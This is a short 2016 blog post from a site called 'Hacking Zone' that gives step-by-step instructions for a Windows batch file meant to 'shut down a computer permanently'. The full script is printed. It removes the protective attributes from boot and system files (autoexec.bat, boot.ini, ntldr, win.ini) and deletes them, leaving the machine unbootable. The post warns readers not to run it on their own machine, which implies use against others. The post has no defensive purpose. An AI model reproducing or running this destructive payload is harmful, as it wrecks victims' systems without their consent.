Posted by : Unknown Tuesday 8 March 2016

Shut Down a Computer Permanently


Method-

1. Open "Notepad".
2. Copy down below code and paste into notepad file.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


3. Save the file as with .bat extension, such as "anyname.bat".


4. You should get the file as shown below.

 Warning--Do not open the file with your own machine, otherwise you will end up with dead system!

sρι∂ү тяιcкs




Leave a Reply

Subscribe to Posts | Subscribe to Comments

- Copyright © Hacking Zone - Blogger Templates - Powered by Blogger - Designed by Johanes Djogan -

>